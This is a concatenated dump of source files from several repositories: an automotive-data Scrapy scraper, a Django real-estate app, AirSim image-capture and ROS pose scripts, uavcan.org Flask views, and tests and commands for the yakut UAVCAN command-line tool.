SubModelsListItem.__name__: self.__handle_submodels_list_item,
YearsListItem.__name__: self.__handle_years_list_item,
MakerModelsCountItem.__name__: self.__set_maker_models_count,
SeriesListItem.__name__: self.__handle_series_list_item,
EnginesListItem.__name__: self.__handle_engines_list_item,
}
@classmethod
def from_crawler(cls, crawler):
return cls(
auto_details_service=crawler.settings.get('AUTO_DETAILS_SERVICE')
)
def process_item(self, item, spider):
cls_name = item.__class__.__name__
if cls_name in self.__handlers:
self.__handlers[cls_name](item)
def __handle_makers_list_item(self, item):
self.__auto_details_service.save_makers(item["makers"])
def __handle_models_list_item(self, item):
self.__auto_details_service.save_models(item["maker_name"], item["models"])
def __handle_submodels_list_item(self, item):
self.__auto_details_service.save_submodels(item["model_id"], item["submodels"])
def __handle_years_list_item(self, item):
self.__auto_details_service.save_years(item["model_id"], item["submodel_id"], item["years"])
def __set_maker_models_count(self, item):
self.__auto_details_service.set_maker_models_count(item["maker_id"], item["models_count"])
def __handle_series_list_item(self, item):
self.__auto_details_service.save_series(item["model_id"], item["submodel_id"], item["year_id"], item["series"])
def __handle_engines_list_item(self, item):
self.__auto_details_service.save_engines(item["model_id"], item["submodel_id"], item["year"],
item["model_series_id"], item["engines"])
```
#### File: scrapper/spiders/autoinfo_cookie_base_spider.py
```python
from autoinfo.cookie import CookieProvider
from autoinfo.services import AutoDetailsService
from scrapper.scrapper.spiders import AutoInfoBaseSpider
class AutoInfoCookieBaseSpider(AutoInfoBaseSpider):
def __init__(self, auto_details_service: AutoDetailsService, cookie_provider: CookieProvider, base_url: str,
**kwargs):
super().__init__(auto_details_service, base_url, **kwargs)
self.__cookie_provider = cookie_provider
self.__refresh_cookie()
def __refresh_cookie(self):
self.__cookie = self.__cookie_provider.get_cookie()
@property
def cookie_provider(self):
return self.__cookie_provider
@property
def script_version(self):
return self.__cookie.script_version
@property
def cookie(self):
return self.__cookie.cookie
def create_basic_request_builder(self):
request_builder = super().create_basic_request_builder()
request_builder.add_params({
"scriptVersion": self.script_version,
"cookie": self.cookie,
})
return request_builder
```
#### File: scrapper/spiders/autoinfo_series_spider.py
```python
import random
from typing import List
from scrapy import Request
from autoinfo.data.plain import Model, Maker, SubModel, Series, ModelYear
from autoinfo.services import AutoDetailsService
from . import AutoInfoBaseSpider
from .parsers import SeriesResponseParser
from ..items import SeriesListItem
class AutoInfoSeriesSpider(AutoInfoBaseSpider):
name = 'autoinfo-series-spider'
def __init__(self, auto_details_service: AutoDetailsService, base_url: str, **kwargs):
super().__init__(auto_details_service, base_url, **kwargs)
self.__series_parsed = 0
self.__parser = SeriesResponseParser(self.logger)
def start_requests(self):
makers = self.auto_details_service.load_makers_dict()
models = self.auto_details_service.load_models_dict()
submodels = self.auto_details_service.load_submodels_dict()
years = self.auto_details_service.load_years()
# we need to shuffle years to prevent using of the same cookie value
# from the same model in multiple subsequent requests
shuffled_indexes = random.sample([i for i in range(len(years))], len(years))
for index in shuffled_indexes:
year = years[index]
if not year.series_handled:
submodel = submodels[year.submodel_id] if year.submodel_id else None
model = models[year.model_id]
maker = makers[model.maker_id]
yield self.__create_download_series_request(maker, model, year, submodel)
def __create_download_series_request(self, maker: Maker, model: Model, year_info: ModelYear, submodel: SubModel):
sub_id, sub_code = self.auto_details_service.get_submodel_properties_or_default(submodel)
request_builder = self.create_basic_request_builder()
request_builder.add_params({
"scriptVersion": model.script_version,
"cookie": model.cookie,
"0": "series",
"1": maker.name,
"2": model.code,
"3": sub_code,
"4": year_info.year
})
request_url = request_builder.build()
return Request(request_url, lambda response: self.__parse_series(model.id, sub_id, year_info.id, response))
def __parse_series(self, model_id, submodel_id, year_id, response):
self.logger.debug(f"#{self.__series_parsed + 1}. Got '{response.text}' for model_id='{model_id}',"
f" submodel_id='{submodel_id}', year_id='{year_id}'.")
decoded_response_text = self.decode_response_if_successful(response)
series: List[Series] = self.__parser(decoded_response_text)
self.__series_parsed += 1
yield SeriesListItem(model_id=model_id, submodel_id=submodel_id, year_id=year_id, series=series)
```
#### File: scrapper/spiders/autoinfo_submodels_spider.py
```python
from typing import List
from scrapy import Request
from autoinfo.data.plain import Model, Maker, SubModel
from autoinfo.services import AutoDetailsService
from . import AutoInfoBaseSpider
from .parsers import SubModelsResponseParser
from ..items import SubModelsListItem
class AutoInfoSubModelsSpider(AutoInfoBaseSpider):
name = 'autoinfo-submodels-spider'
def __init__(self, auto_details_service: AutoDetailsService, base_url: str, **kwargs):
super().__init__(auto_details_service, base_url, **kwargs)
self.__parser = SubModelsResponseParser(self.logger)
def start_requests(self):
makers = self.auto_details_service.load_makers_dict()
for model in self.auto_details_service.load_models():
if not model.submodels_handled:
yield self.__create_download_submodels_request(makers[model.maker_id], model)
def __create_download_submodels_request(self, maker: Maker, model: Model):
request_builder = self.create_basic_request_builder()
request_builder.add_params({
"scriptVersion": model.script_version,
"cookie": model.cookie,
"0": "submodel",
"1": maker.name,
"2": model.code
})
request_url = request_builder.build()
return Request(request_url, lambda response: self.__parse_submodels(model.id, response))
def __parse_submodels(self, model_id, response):
decoded_response_text = self.decode_response_if_successful(response)
submodels_list: List[SubModel] = self.__parser(decoded_response_text)
yield SubModelsListItem(model_id=model_id, submodels=submodels_list)
```
#### File: spiders/parsers/models_response_parser.py
```python
import json
from typing import List
from autoinfo.data.plain import Model
class ModelsResponseParser:
def __init__(self, logger):
self.__logger = logger
def __call__(self, decoded_response_text: str, *args, **kwargs):
models_data = json.loads(f"[{decoded_response_text}]")
models_list_item = self.__parse_models(models_data)
return models_list_item
# noinspection PyMethodMayBeStatic
def __parse_models(self, models_data):
handled_models = set()
models: List[Model] = []
for code, name in models_data:
if name not in ['- Popular Models -', '- All Models -'] and code not in handled_models:
handled_models.add(code)
models.append(Model(model_code=code, model_name=name))
return models
```
#### File: spiders/parsers/submodels_response_parser.py
```python
import json
from autoinfo.data.plain import SubModel
class SubModelsResponseParser:
def __init__(self, logger):
self.__logger = logger
def __call__(self, decoded_response_text: str, *args, **kwargs):
submodels_data = json.loads(f"[{decoded_response_text}]")
submodels_list = [SubModel(code=code, name=name) for code, name in submodels_data if
name != "ALL" and code and name]
return submodels_list
```
|
{
"source": "jeylani99/Real-Estate",
"score": 2
}
|
#### File: jeylani99/Real-Estate/views.py
```python
from django.shortcuts import render
from django.views import generic
from .models import Location,Property
# Create your views here.
class IndexView(generic.ListView):
template_name = 'homesapp/index.html'
def get_queryset(self):
return Location.objects.all()
class LocationView(generic.DetailView):
model = Location
template_name = 'homesapp/locationview.html'
class PropertyView(generic.DetailView):
model = Property
template_name = 'homesapp/propertyview.html'
```
|
{
"source": "jeyong/AirSim",
"score": 3
}
|
#### File: PythonClient/computer_vision/capture_ir_segmentation.py
```python
import numpy
import cv2
import time
import sys
import os
import random
import glob
from airsim import *
def get_image(x, y, z, pitch, roll, yaw, client):
"""
title::
get_image
description::
Capture images (as numpy arrays) from a certain position.
inputs::
x
x position in meters
y
y position in meters
z
altitude in meters; remember NED, so should be negative to be
above ground
pitch
angle (in radians); in computer vision mode, this is camera angle
roll
angle (in radians)
yaw
angle (in radians)
client
connection to AirSim (e.g., client = MultirotorClient() for UAV)
returns::
position
AirSim position vector (access values with x_val, y_val, z_val)
angle
AirSim quaternion ("angles")
im
segmentation or IR image, depending upon palette in use (3 bands)
imScene
scene image (3 bands)
author::
<NAME>
<NAME>
"""
#Set pose and sleep after to ensure the pose sticks before capturing image.
client.simSetVehiclePose(Pose(Vector3r(x, y, z), \
to_quaternion(pitch, roll, yaw)), True)
time.sleep(0.1)
#Capture segmentation (IR) and scene images.
responses = \
client.simGetImages([ImageRequest("0", ImageType.Infrared,
False, False),
ImageRequest("0", ImageType.Scene, \
False, False),
ImageRequest("0", ImageType.Segmentation, \
False, False)])
#Change images into numpy arrays.
img1d = numpy.fromstring(responses[0].image_data_uint8, dtype=numpy.uint8)
im = img1d.reshape(responses[0].height, responses[0].width, 4)
img1dscene = numpy.fromstring(responses[1].image_data_uint8, dtype=numpy.uint8)
imScene = img1dscene.reshape(responses[1].height, responses[1].width, 4)
return Vector3r(x, y, z), to_quaternion(pitch, roll, yaw),\
im[:,:,:3], imScene[:,:,:3] #get rid of alpha channel
def main(client,
objectList,
pitch=numpy.radians(270), #image straight down
roll=0,
yaw=0,
z=-122,
writeIR=False,
writeScene=False,
irFolder='',
sceneFolder=''):
"""
title::
main
description::
Follow objects of interest and record images while following.
inputs::
client
connection to AirSim (e.g., client = MultirotorClient() for UAV)
objectList
list of tag names within the AirSim environment, corresponding to
objects to follow (add tags by clicking on object, going to
Details, Actor, and Tags, then add component)
pitch
angle (in radians); in computer vision mode, this is camera angle
roll
angle (in radians)
yaw
angle (in radians)
z
altitude in meters; remember NED, so should be negative to be
above ground
write
if True, will write out the images
folder
path to a particular folder that should be used (then within that
folder, expected folders are ir and scene)
author::
<NAME>
"""
i = 0
for o in objectList:
startTime = time.time()
currentTime = time.time() - startTime
pose = client.simGetObjectPose(o);
#Capture images for a certain amount of time in seconds (half hour now)
while currentTime < 1800:
#Capture image - pose.position x_val access may change w/ AirSim
#version (pose.position.x_val new, pose.position[b'x_val'] old)
vector, angle, ir, scene = get_image(pose.position.x_val,
pose.position.y_val,
z,
pitch,
roll,
yaw,
client)
#Convert color scene image to BGR for write out with cv2.
r,g,b = cv2.split(scene)
scene = cv2.merge((b,g,r))
if writeIR:
cv2.imwrite(irFolder+'ir_'+str(i).zfill(5)+'.png', ir)
if writeScene:
cv2.imwrite(sceneFolder+'scene_'+str(i).zfill(5)+'.png',
scene)
i += 1
currentTime = time.time() - startTime
pose = client.simGetObjectPose(o);
if __name__ == '__main__':
#Connect to AirSim, UAV mode.
client = MultirotorClient()
client.confirmConnection()
#Tags for poachers in each of the three groups in Africa enviornment.
objectList = ['Poacher1A', 'Poacher1B', 'Poacher1C']
#Sample calls to main, varying camera angle and altitude.
#straight down, 400ft
main(client,
objectList,
folder=r'auto\winter\400ft\down')
#straight down, 200ft
main(client,
objectList,
z=-61,
folder=r'auto\winter\200ft\down')
#45 degrees, 200ft -- note that often object won't be scene since position
#is set exactly to object's
main(client,
objectList,
z=-61,
pitch=numpy.radians(315),
folder=r'auto\winter\200ft\45')
#45 degrees, 400ft -- note that often object won't be scene since position
#is set exactly to object's
main(client,
objectList,
pitch=numpy.radians(315),
folder=r'auto\winter\400ft\45')
```
#### File: PythonClient/ros/car_pose.py
```python
import setup_path
import airsim
import rospy
import tf
from std_msgs.msg import String
from geometry_msgs.msg import PoseStamped
import time
def airpub():
pub = rospy.Publisher("airsimPose", PoseStamped, queue_size=1)
rospy.init_node('airpub', anonymous=True)
rate = rospy.Rate(10) # 10hz
# connect to the AirSim simulator
client = airsim.CarClient()
client.confirmConnection()
# start = time.time()
while not rospy.is_shutdown():
# get state of the car
car_state = client.getCarState()
pos = car_state.kinematics_estimated.position
orientation = car_state.kinematics_estimated.orientation
# milliseconds = (time.time() - start) * 1000
# populate PoseStamped ros message
simPose = PoseStamped()
simPose.pose.position.x = pos.x_val
simPose.pose.position.y = pos.y_val
simPose.pose.position.z = pos.z_val
simPose.pose.orientation.w = orientation.w_val
simPose.pose.orientation.x = orientation.x_val
simPose.pose.orientation.y = orientation.y_val
simPose.pose.orientation.z = orientation.z_val
simPose.header.stamp = rospy.Time.now()
simPose.header.seq = 1
simPose.header.frame_id = "simFrame"
# log PoseStamped message
rospy.loginfo(simPose)
#publish PoseStamped message
pub.publish(simPose)
# sleeps until next cycle
rate.sleep()
if __name__ == '__main__':
try:
airpub()
except rospy.ROSInterruptException:
pass
```
|
{
"source": "jeyong/uavcan.org",
"score": 2
}
|
#### File: app/view/conformant_products.py
```python
from .. import app
from flask import render_template
from .home import TITLE
@app.route('/conformant-products')
def conformant_products():
return render_template('conformant-products.html',
title=TITLE)
```
#### File: app/view/consortium.py
```python
import os
from flask import render_template, send_file, abort
from .. import app
from .home import TITLE
from ..model import adopters
_CONSORTIUM_DIRECTORY_PATH = os.path.join(app.root_path, '..', 'consortium')
@app.route('/consortium')
def consortium():
adopter_list = list(adopters.get_list())
return render_template('consortium.html',
title=TITLE,
adopters=adopter_list)
@app.route('/consortium/<path:file_name>')
def _consortium_document(file_name):
try:
return send_file(os.path.join(_CONSORTIUM_DIRECTORY_PATH, file_name))
except FileNotFoundError:
return abort(404)
```
|
{
"source": "jeyong/yakut",
"score": 2
}
|
#### File: tests/cmd/interaction.py
```python
from __future__ import annotations
import time
import json
import typing
import pytest
import pyuavcan
import yakut
import yakut.yaml
from tests.subprocess import execute_cli, Subprocess
from tests.dsdl import OUTPUT_DIR
from tests.transport import TransportFactory
def _unittest_pub_sub_regular(transport_factory: TransportFactory, compiled_dsdl: typing.Any) -> None:
_ = compiled_dsdl
env = {
"YAKUT_TRANSPORT": transport_factory(None).expression,
"YAKUT_PATH": str(OUTPUT_DIR),
}
proc_sub_heartbeat = Subprocess.cli(
"--format=json",
"sub",
"uavcan.node.Heartbeat.1.0",
environment_variables=env,
)
proc_sub_diagnostic = Subprocess.cli(
"--format=json",
"sub",
"4321:uavcan.diagnostic.Record.1.1",
"--count=3",
environment_variables=env,
)
proc_sub_diagnostic_wrong_pid = Subprocess.cli(
"--format=yaml",
"sub",
"uavcan.diagnostic.Record.1.1",
"--count=3",
environment_variables=env,
)
proc_sub_temperature = Subprocess.cli(
"--format=json",
"sub",
"555:uavcan.si.sample.temperature.Scalar.1.0",
"--count=3",
"--no-metadata",
environment_variables=env,
)
time.sleep(1.0) # Time to let the background processes finish initialization
proc_pub = Subprocess.cli(
"-v",
"--heartbeat-vssc=54",
"--heartbeat-priority=high",
"--node-info",
"{software_image_crc: [0xdeadbeef]}",
f"--transport={transport_factory(51).expression}", # Takes precedence over the environment variable.
"pub",
"4321:uavcan.diagnostic.Record.1.1",
'{severity: {value: 6}, timestamp: {microsecond: 123456}, text: "Hello world!"}',
"1234:uavcan.diagnostic.Record.1.1",
'{text: "Goodbye world."}',
"555:uavcan.si.sample.temperature.Scalar.1.0",
"{kelvin: 123.456}",
"--count=3",
"--period=2",
"--priority=slow",
environment_variables=env,
)
time.sleep(2.0) # Time to let the publisher boot up properly.
# Request GetInfo from the publisher we just launched.
_, stdout, _ = execute_cli(
f"--transport={transport_factory(52).expression}",
f"--path={OUTPUT_DIR}",
"call",
"51",
"uavcan.node.GetInfo.1.0",
"--no-metadata",
"--timeout=5",
timeout=10.0,
)
parsed = yakut.yaml.Loader().load(stdout)
assert parsed[430]["protocol_version"] == {
"major": pyuavcan.UAVCAN_SPECIFICATION_VERSION[0],
"minor": pyuavcan.UAVCAN_SPECIFICATION_VERSION[1],
}
assert parsed[430]["software_version"] == {
"major": yakut.__version_info__[0],
"minor": yakut.__version_info__[1],
}
assert parsed[430]["software_image_crc"] == [0xDEADBEEF]
assert parsed[430]["name"] == "org.uavcan.yakut.publish"
proc_pub.wait(10.0)
time.sleep(1.0) # Time to sync up
# Parse the output from the subscribers and validate it.
out_sub_heartbeat = proc_sub_heartbeat.wait(1.0, interrupt=True)[1].splitlines()
out_sub_diagnostic = proc_sub_diagnostic.wait(1.0, interrupt=True)[1].splitlines()
out_sub_temperature = proc_sub_temperature.wait(1.0, interrupt=True)[1].splitlines()
heartbeats = list(map(json.loads, out_sub_heartbeat))
diagnostics = list(map(json.loads, out_sub_diagnostic))
temperatures = list(map(json.loads, out_sub_temperature))
print("heartbeats:", *heartbeats, sep="\n\t")
print("diagnostics:", *diagnostics, sep="\n\t")
print("temperatures:", *temperatures, sep="\n\t")
assert 1 <= len(heartbeats) <= 20
for m in heartbeats:
src_nid = m["7509"]["_metadata_"]["source_node_id"]
if src_nid == 51: # The publisher
assert "high" in m["7509"]["_metadata_"]["priority"].lower()
assert m["7509"]["_metadata_"]["transfer_id"] >= 0
assert m["7509"]["uptime"] in range(10)
assert m["7509"]["vendor_specific_status_code"] == 54
elif src_nid == 52: # The caller (GetInfo)
assert "nominal" in m["7509"]["_metadata_"]["priority"].lower()
assert m["7509"]["_metadata_"]["transfer_id"] >= 0
assert m["7509"]["uptime"] in range(4)
else:
assert False
assert len(diagnostics) == 3
for m in diagnostics:
assert "slow" in m["4321"]["_metadata_"]["priority"].lower()
assert m["4321"]["_metadata_"]["transfer_id"] >= 0
assert m["4321"]["_metadata_"]["source_node_id"] == 51
assert m["4321"]["timestamp"]["microsecond"] == 123456
assert m["4321"]["text"] == "Hello world!"
assert len(temperatures) == 3
assert all(map(lambda mt: mt["555"]["kelvin"] == pytest.approx(123.456), temperatures))
assert proc_sub_diagnostic_wrong_pid.alive
assert proc_sub_diagnostic_wrong_pid.wait(1.0, interrupt=True)[1].strip() == ""
def _unittest_slow_cli_pub_sub_anon(transport_factory: TransportFactory, compiled_dsdl: typing.Any) -> None:
_ = compiled_dsdl
env = {
"YAKUT_TRANSPORT": transport_factory(None).expression,
"YAKUT_PATH": str(OUTPUT_DIR),
}
proc_sub_heartbeat = Subprocess.cli(
"-v",
"--format=json",
"sub",
"uavcan.node.Heartbeat.1.0",
environment_variables=env,
)
proc_sub_diagnostic_with_meta = Subprocess.cli(
"-v",
"--format=json",
"sub",
"uavcan.diagnostic.Record.1.1",
environment_variables=env,
)
proc_sub_diagnostic_no_meta = Subprocess.cli(
"-v",
"--format=json",
"sub",
"uavcan.diagnostic.Record.1.1",
"--no-metadata",
environment_variables=env,
)
time.sleep(3.0) # Time to let the background processes finish initialization
if transport_factory(None).can_transmit:
proc = Subprocess.cli(
"pub",
"uavcan.diagnostic.Record.1.1",
"{}",
"--count=2",
"--period=2",
environment_variables=env,
)
proc.wait(timeout=8)
time.sleep(2.0) # Time to sync up
assert (
proc_sub_heartbeat.wait(1.0, interrupt=True)[1].strip() == ""
), "Anonymous nodes must not broadcast heartbeat"
diagnostics = list(
json.loads(s) for s in proc_sub_diagnostic_with_meta.wait(1.0, interrupt=True)[1].splitlines()
)
print("diagnostics:", diagnostics)
# Remember that anonymous transfers over redundant transports are NOT deduplicated.
# Hence, to support the case of redundant transports, we use 'greater or equal' here.
assert len(diagnostics) >= 2
for m in diagnostics:
assert "nominal" in m["8184"]["_metadata_"]["priority"].lower()
assert m["8184"]["_metadata_"]["transfer_id"] >= 0
assert m["8184"]["_metadata_"]["source_node_id"] is None
assert m["8184"]["timestamp"]["microsecond"] == 0
assert m["8184"]["text"] == ""
diagnostics = list(json.loads(s) for s in proc_sub_diagnostic_no_meta.wait(1.0, interrupt=True)[1].splitlines())
print("diagnostics:", diagnostics)
assert len(diagnostics) >= 2 # >= because see above
for m in diagnostics:
assert m["8184"]["timestamp"]["microsecond"] == 0
assert m["8184"]["text"] == ""
else:
proc = Subprocess.cli(
"-v",
"pub",
"uavcan.diagnostic.Record.1.1",
"{}",
"--count=2",
"--period=2",
environment_variables=env,
)
assert 0 < proc.wait(timeout=8, log=False)[0]
```
#### File: orchestrate/a_gnu/__init__.py
```python
import sys
import time
from pathlib import Path
import pytest
from yakut.cmd.orchestrate import exec_composition, load_composition, Stack, Context, ErrorCode, exec_file, load_ast
from .... import ROOT_DIR
if sys.platform.startswith("win"): # pragma: no cover
pytest.skip("These are GNU/Linux-only tests", allow_module_level=True)
def _std_reset() -> None:
if sys.stdout.seekable():
sys.stdout.seek(0)
sys.stdout.truncate(0)
if sys.stderr.seekable():
sys.stderr.seek(0)
sys.stderr.truncate(0)
def _std_flush() -> None:
sys.stdout.flush()
sys.stderr.flush()
def _unittest_a(stdout_file: Path, stderr_file: Path) -> None:
_ = stdout_file, stderr_file
ast = load_ast((Path(__file__).parent / "a.orc.yaml").read_text())
comp = load_composition(ast, {"C": b"DEF", "D": b"this variable will be unset"})
print(comp)
ctx = Context(lookup_paths=[])
# Regular test, runs until completion.
_std_reset()
started_at = time.monotonic()
assert 100 == exec_composition(ctx, comp, gate=_true, stack=Stack())
elapsed = time.monotonic() - started_at
assert 10 <= elapsed <= 15, "Parallel execution is not handled correctly."
_std_flush()
sys.stdout.seek(0)
assert sys.stdout.read().splitlines() == [
"100 abc DEF",
"finalizer",
"a.d.e: 1 2 3",
]
sys.stderr.seek(0)
assert "text value\n" in sys.stderr.read()
# Interrupted five seconds in.
_std_reset()
started_at = time.monotonic()
assert 0 != exec_composition(ctx, comp, gate=lambda: time.monotonic() - started_at < 5.0, stack=Stack())
elapsed = time.monotonic() - started_at
assert 5 <= elapsed <= 9, "Interruption is not handled correctly."
_std_flush()
sys.stdout.seek(0)
assert sys.stdout.read().splitlines() == [
"100 abc DEF",
]
sys.stderr.seek(0)
assert "text value\n" in sys.stderr.read()
# Refers to a non-existent file.
comp = load_composition(ast, {"CRASH": b"1"})
print(comp)
assert ErrorCode.FILE_ERROR == exec_composition(ctx, comp, gate=_true, stack=Stack())
def _unittest_b(stdout_file: Path) -> None:
_ = stdout_file
ctx = Context(lookup_paths=[ROOT_DIR, Path(__file__).parent])
_std_reset()
env = {"PROCEED_B": b"1"}
assert 0 == exec_file(ctx, "b.orc.yaml", env, gate=_true)
_std_flush()
sys.stdout.seek(0)
assert sys.stdout.read().splitlines() == [
"main b",
"123",
"456",
"finalizer b",
"finalizer b 1",
]
assert env == {
"PROCEED_B": b"1",
"FOO": b"123",
"BAR": b"123",
}
_std_reset()
env = {}
assert 0 == exec_file(ctx, str((Path(__file__).parent / "b.orc.yaml").absolute()), env, gate=_true)
_std_flush()
sys.stdout.seek(0)
assert sys.stdout.read().splitlines() == [
"finalizer b",
]
assert env == {
"FOO": b"123",
"BAR": b"123",
}
_std_reset()
env = {"PLEASE_FAIL": b"1"}
assert 0 == exec_file(ctx, "b.orc.yaml", env, gate=_true)
_std_flush()
sys.stdout.seek(0)
assert sys.stdout.read().splitlines() == [
"finalizer b",
]
assert env == {
"PLEASE_FAIL": b"1",
"FOO": b"123",
"BAR": b"123",
}
_std_reset()
env = {"PROCEED_B": b"1", "PLEASE_FAIL": b"1"}
assert 42 == exec_file(ctx, "b.orc.yaml", env, gate=_true)
_std_flush()
sys.stdout.seek(0)
assert sys.stdout.read().splitlines() == [
"main b",
"123",
"456",
"finalizer b",
"finalizer b 1",
]
assert env == {
"PROCEED_B": b"1",
"PLEASE_FAIL": b"1",
"FOO": b"123",
"BAR": b"123",
}
ctx = Context(lookup_paths=[])
assert ErrorCode.FILE_ERROR == exec_file(ctx, "b.orc.yaml", {"PROCEED_B": b"1"}, gate=_true)
ctx = Context(lookup_paths=[Path(__file__).parent])
assert ErrorCode.FILE_ERROR == exec_file(ctx, "b.orc.yaml", {"PROCEED_B": b"1"}, gate=_true)
ctx = Context(lookup_paths=[])
assert ErrorCode.FILE_ERROR == exec_file(ctx, "b.orc.yaml", {}, gate=_true)
def _true() -> bool:
return True
```
#### File: tests/deps/sitecustomize.py
```python
import os
import sys
import pathlib
ROOT_DIR = pathlib.Path(__file__).resolve().parent.parent.parent
SETUP_CFG = ROOT_DIR / "setup.cfg"
assert SETUP_CFG.is_file()
def detect_debugger() -> bool:
if sys.gettrace() is not None:
return True
if (os.path.sep + "pydev") in sys.argv[0]:
return True
return False
def setup_coverage() -> None:
try:
import coverage # The module may be missing during early stage setup, no need to abort everything.
except ImportError as ex:
pass
else:
# Coverage configuration; see https://coverage.readthedocs.io/en/coverage-4.2/subprocess.html
os.environ["COVERAGE_PROCESS_START"] = str(SETUP_CFG)
coverage.process_startup()
if not detect_debugger():
setup_coverage()
```
#### File: yakut/cmd/call.py
```python
import sys
import typing
import decimal
import contextlib
import click
import pyuavcan
import yakut
from yakut.helpers import EnumParam
from yakut.param.formatter import Formatter
from yakut.util import convert_transfer_metadata_to_builtin, construct_port_id_and_type
_S = typing.TypeVar("_S", bound=pyuavcan.dsdl.ServiceObject)
_logger = yakut.get_logger(__name__)
def _validate_request_fields(ctx: click.Context, param: click.Parameter, value: str) -> typing.Any:
from yakut.yaml import EvaluableLoader
eval_context: typing.Dict[str, typing.Any] = {} # Add useful members later.
try:
fields = EvaluableLoader(eval_context).load(value)
except Exception as ex:
raise click.BadParameter(f"Could not parse the request object fields: {ex}", ctx=ctx, param=param)
return fields
@yakut.subcommand()
@click.argument("server_node_id", metavar="SERVER_NODE_ID", type=int, required=True)
@click.argument("service", metavar="SERVICE", type=str, required=True)
@click.argument("request_fields", metavar="FIELDS", type=str, callback=_validate_request_fields, default="{}")
@click.option(
"--timeout",
"-T",
type=float,
default=pyuavcan.presentation.DEFAULT_SERVICE_REQUEST_TIMEOUT,
show_default=True,
metavar="SECONDS",
help=f"Request timeout; how long to wait for the response before giving up.",
)
@click.option(
"--priority",
"-P",
default=pyuavcan.presentation.DEFAULT_PRIORITY,
type=EnumParam(pyuavcan.transport.Priority),
help=f"Priority of the request transfer. [default: {pyuavcan.presentation.DEFAULT_PRIORITY.name}]",
)
@click.option(
"--with-metadata/--no-metadata",
"+M/-M",
default=False,
show_default=True,
help="When enabled, the response object is prepended with an extra field named `_metadata_`.",
)
@yakut.pass_purser
def call(
purser: yakut.Purser,
server_node_id: int,
service: str,
request_fields: typing.Any,
timeout: float,
priority: pyuavcan.transport.Priority,
with_metadata: bool,
) -> None:
"""
Invoke an RPC-service using the specified request object and print the response.
Unless the local transport is configured in anonymous node,
while waiting for the response the local node will also publish on standard subjects like
Heartbeat and provide some standard RPC-services like GetInfo.
The first positional argument is the server node-ID.
The second is the pair of service-ID (which can be omitted if a fixed one is defined for the type)
and the data type name of the form:
\b
[SERVICE_ID:]FULL_SERVICE_TYPE_NAME.MAJOR.MINOR
In the data type name, forward or backward slashes can be used instead of ".";
version numbers can be also separated using underscores.
This is done to allow the user to rely on filesystem autocompletion when typing the command.
The third positional argument specifies the values of the request object fields in YAML format
(or JSON, which is a subset of YAML).
Missing fields will be left at their default values.
If omitted, this argument defaults to an empty object: `{}`.
For more info about the format see PyUAVCAN documentation on builtin-based representations.
The output will be printed as a key-value mapping of one element where the key is the service-ID
and the value is the received response object.
Examples:
\b
yakut call 42 uavcan.node.GetInfo.1.0 +M -T3 -Pe
yakut call 42 123:sirius_cyber_corp.PerformLinearLeastSquaresFit.1.0 'points: [{x: 10, y: 1}, {x: 20, y: 2}]'
"""
try:
from pyuavcan.application import Node
except ImportError as ex:
from yakut.cmd.compile import make_usage_suggestion
raise click.UsageError(make_usage_suggestion(ex.name))
_logger.debug(
"server_node_id=%s, service=%r, request_fields=%r, timeout=%.6f, priority=%s, with_metadata=%s",
server_node_id,
service,
request_fields,
timeout,
priority,
with_metadata,
)
service_id, dtype = construct_port_id_and_type(service)
if not issubclass(dtype, pyuavcan.dsdl.ServiceObject):
raise TypeError(f"Expected a service type; got {dtype.__name__}")
request = pyuavcan.dsdl.update_from_builtin(dtype.Request(), request_fields)
_logger.info("Request object: %r", request)
formatter = purser.make_formatter()
node = purser.get_node("call", allow_anonymous=False)
assert isinstance(node, Node) and callable(formatter)
with contextlib.closing(node):
client = node.presentation.make_client(dtype, service_id, server_node_id)
client.response_timeout = timeout
client.priority = priority
node.start()
_run(client, request, formatter, with_metadata=with_metadata)
@yakut.asynchronous
async def _run(
client: pyuavcan.presentation.Client[_S],
request: pyuavcan.dsdl.CompositeObject,
formatter: Formatter,
with_metadata: bool,
) -> None:
request_ts_transport: typing.Optional[pyuavcan.transport.Timestamp] = None
def on_transfer_feedback(fb: pyuavcan.transport.Feedback) -> None:
nonlocal request_ts_transport
request_ts_transport = fb.first_frame_transmission_timestamp
client.output_transport_session.enable_feedback(on_transfer_feedback)
request_ts_application = pyuavcan.transport.Timestamp.now()
result = await client.call(request)
response_ts_application = pyuavcan.transport.Timestamp.now()
if result is None:
click.secho(f"The request has timed out after {client.response_timeout:0.1f} seconds", err=True, fg="red")
sys.exit(1)
if not request_ts_transport: # pragma: no cover
request_ts_transport = request_ts_application
_logger.warning(
"The transport implementation is misbehaving: feedback was never emitted; "
"falling back to software timestamping. "
"Please submit a bug report. Involved instances: client=%r, result=%r",
client,
result,
)
response, transfer = result
transport_duration = transfer.timestamp.monotonic - request_ts_transport.monotonic
application_duration = response_ts_application.monotonic - request_ts_application.monotonic
_logger.info(
"Request duration [second]: "
"transport layer: %.6f, application layer: %.6f, application layer overhead: %.6f",
transport_duration,
application_duration,
application_duration - transport_duration,
)
bi: typing.Dict[str, typing.Any] = {} # We use updates to ensure proper dict ordering: metadata before data
if with_metadata:
qnt = decimal.Decimal("0.000001")
bi.update(
convert_transfer_metadata_to_builtin(
transfer,
roundtrip_time={
"transport_layer": (transfer.timestamp.monotonic - request_ts_transport.monotonic).quantize(qnt),
"application_layer": application_duration.quantize(qnt),
},
)
)
bi.update(pyuavcan.dsdl.to_builtin(response))
print(formatter({client.port_id: bi}))
```
#### File: yakut/cmd/documentation.py
```python
import sys
import typing
import click
import yakut
_logger = yakut.get_logger(__name__)
@yakut.subcommand()
@click.argument("name", default="")
def documentation(name: str) -> None:
"""
Show transport usage documentation from PyUAVCAN.
Transports whose dependencies are not installed will not be shown.
If the argument NAME is provided, the documentation will be shown only for entities whose name contains
the specified string (case-insensitive), like "udp".
Full documentation is available at https://pyuavcan.readthedocs.io
"""
import pydoc
import pyuavcan
fill_width = click.get_terminal_size()[0] - 1
# noinspection PyTypeChecker
pyuavcan.util.import_submodules(pyuavcan.transport, error_handler=_handle_import_error)
transport_base = pyuavcan.transport.Transport
texts: typing.List[str] = []
for cls in pyuavcan.util.iter_descendants(transport_base):
if not cls.__name__.startswith("_") and cls is not transport_base:
public_module = cls.__module__.split("._")[0]
public_name = public_module + "." + cls.__name__
if name.lower() in public_name.lower():
texts.append(
"\n".join(
[
"-" * fill_width,
public_name.center(fill_width, " "),
"-" * fill_width,
cls.__doc__,
pydoc.text.document(cls.__init__),
"",
]
)
)
if texts:
click.echo_via_pager(texts)
else:
click.secho(f"There are no entries that match {name!r}", err=True, fg="red")
sys.exit(1)
def _handle_import_error(name: str, ex: ImportError) -> None:
